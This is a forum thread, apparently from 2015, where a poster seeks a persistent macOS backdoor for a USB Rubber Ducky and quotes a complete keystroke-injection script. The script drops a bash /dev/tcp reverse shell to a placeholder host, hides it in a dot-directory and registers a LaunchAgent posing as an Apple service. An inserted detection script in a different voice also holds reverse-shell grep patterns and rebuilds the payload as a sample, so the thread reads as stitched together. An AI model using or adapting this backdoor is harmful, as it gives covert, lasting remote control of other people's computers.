Net_Spy Posted September 1, 2015 (edited)
Greetings, I'm looking for a payload for the Rubber Ducky to execute on Mac OS and give a persistent connection even after a restart of the target. I've found the script below, which can only initiate a reverse connection once. Can anyone help me out to make it persistent, so that it runs the reverse connection payload after each reboot or when the machine comes back online after a shutdown? Here is the script, made by Patrick:

REM Patrick Mosca
REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
REM Open Terminal through Spotlight (GUI SPACE), then type the commands below into it
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 500
REM Drop the reverse shell script in a dot-directory under ~/Library so Finder does not show it
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
REM bash -i with stdin/stdout/stderr redirected to /dev/tcp gives the listener an interactive shell
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
REM Per-user LaunchAgents are loaded by launchd at every login of this user; -p avoids an error if the directory already exists
STRING mkdir -p ~/Library/LaunchAgents
ENTER
DELAY 200
REM The '$HOME' below closes and reopens the single quotes so the shell expands the absolute path into the plist
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
REM RunAtLoad starts the job at login; StartInterval relaunches it every 60 seconds once it has exited, so a dropped connection is retried
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
REM Register the agent in the current session so the first callback happens now, not at the next login
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
GUI q

Edited September 1, 2015 by Net_Spy
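For the defensive side of the same mechanism, here is an added example (my own code, not from the post or from Patrick Mosca's payload) that hunts for the LaunchAgent pattern the script installs: an Apple-lookalike Label in a per-user LaunchAgents directory, RunAtLoad combined with a short StartInterval, a program argument living in a dot-directory, and a referenced script containing a bash /dev/tcp reverse shell. The function names (plist_value, program_args, triage_plist, triage_score, make_sample), the indicator thresholds, and the two sample plists it builds in a temp directory are all my own constructions; the suspicious sample mirrors the plist and connect.sh the payload writes, with the post's mysite.com placeholder. It uses only POSIX sh, awk and grep, so it runs on Linux for testing as well as on a Mac without plutil.

```shell
#!/bin/sh
# Added example, not from the original post: hunt for the LaunchAgent
# persistence pattern above. POSIX sh + awk/grep only (no plutil), so it
# runs on Linux for testing as well as on macOS.

# plist_value FILE KEY: print the scalar that follows <key>KEY</key>
# (<string>, <integer>, <true/> or <false/>); prints nothing if absent.
plist_value() {
    awk -v key="<key>$2</key>" '
        want && /<string>|<integer>|<true\/>|<false\/>/ {
            if ($0 ~ /<true\/>/)       print "true"
            else if ($0 ~ /<false\/>/) print "false"
            else { sub(/.*<(string|integer)>/, ""); sub(/<\/(string|integer)>.*/, ""); print }
            exit
        }
        index($0, key) { want = 1 }
    ' "$1"
}

# program_args FILE: one line per <string> inside the ProgramArguments array.
program_args() {
    awk '
        /<key>ProgramArguments<\/key>/ { inargs = 1; next }
        inargs && /<\/array>/          { exit }
        inargs && /<string>/ { sub(/.*<string>/, ""); sub(/<\/string>.*/, ""); print }
    ' "$1"
}

# triage_plist FILE: print one "[!] reason" line per indicator found.
# Thresholds and indicators are my own choices, tuned to the payload above.
triage_plist() {
    plist=$1
    label=$(plist_value "$plist" Label)
    runatload=$(plist_value "$plist" RunAtLoad)
    interval=$(plist_value "$plist" StartInterval)

    # 1. Apple-looking label in a per-user LaunchAgents dir. Genuine Apple
    #    agents live under /System/Library; "com.apples.services" is a lookalike.
    case $label in
        com.apple*) echo "[!] Apple-lookalike label '$label' in a user LaunchAgents dir" ;;
    esac

    # 2. RunAtLoad plus a short StartInterval: started at login and relaunched
    #    every N seconds, which is a beaconing loop rather than a one-shot helper.
    if [ "$runatload" = true ] && [ -n "$interval" ] && [ "$interval" -le 300 ]; then
        echo "[!] RunAtLoad with StartInterval=${interval}s (re-spawn loop)"
    fi

    program_args "$plist" | while IFS= read -r arg; do
        # 3. Anything executed from a dot-directory.
        case $arg in
            */.*) echo "[!] argument inside a hidden directory: $arg" ;;
        esac
        # 4. The referenced script carries a bash /dev/tcp or nc reverse shell.
        if [ -f "$arg" ] && grep -Eq '/dev/tcp/|bash -i|nc -e|nc .* -e' "$arg"; then
            echo "[!] reverse-shell indicator in $arg: $(grep -Eo '/dev/tcp/[^ ]*' "$arg" | head -1)"
        fi
    done
}

# triage_score FILE: number of indicators, for sorting or alert thresholds.
triage_score() {
    triage_plist "$1" | grep -c '^\[!\]' || true
}

# make_sample: constructed test data (not captured from a real machine). One
# agent mirrors the payload's plist and connect.sh; one is a benign updater.
make_sample() {
    dir=$(mktemp -d)
    mkdir -p "$dir/LaunchAgents" "$dir/.hidden"
    printf '%s\n' '#!/bin/bash' 'bash -i >& /dev/tcp/mysite.com/1337 0>&1' 'wait' > "$dir/.hidden/connect.sh"
    cat > "$dir/LaunchAgents/com.apples.services.plist" <<EOF
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>$dir/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
</dict>
</plist>
EOF
    cat > "$dir/LaunchAgents/com.example.updater.plist" <<EOF
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.updater</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Example.app/Contents/MacOS/updater</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOF
    echo "$dir"
}

# Stand-alone run over the constructed sample; point the glob at
# "$HOME"/Library/LaunchAgents/*.plist on a real Mac.
sample=$(make_sample)
for f in "$sample"/LaunchAgents/*.plist; do
    echo "== $f (score $(triage_score "$f"))"
    triage_plist "$f"
done
```

The parsing is deliberately line-oriented and assumes one element per line, which is how the payload writes the file and how most hand-written plists look; a minified or binary plist would need `plutil -convert xml1` first. On a real Mac the same checks are worth running over /Library/LaunchAgents and /Library/LaunchDaemons as well, since a root-level drop of the same pattern would survive a user account change.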
V3sth4cks153 Posted September 6, 2015 (edited)
Hi. I think that's what you're looking for: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/ This payload uses crontab, but it works just as well! The only problem is that it relies on a privilege escalation vulnerability in OS X Yosemite, which has been patched in OS X 10.10.5, and as far as I'm aware it's only been tested on Yosemite. I hope this solves your issue! V3sth4cks153
Edited September 6, 2015 by V3sth4cks153
Net_Spy (Author) Posted October 19, 2015
@V3sth4cks153 Do I need to make the USB firmware as twin compose for that or not? Regards, Net_Spy
V3sth4cks153 Posted October 19, 2015
> @V3sth4cks153 Do I need to make the USB firmware as twin compose for that or not? Regards, Net_Spy
Hi, No, you don't need to: the script will work on the stock firmware, as it is fully self-contained. Regards, V3sth4cks153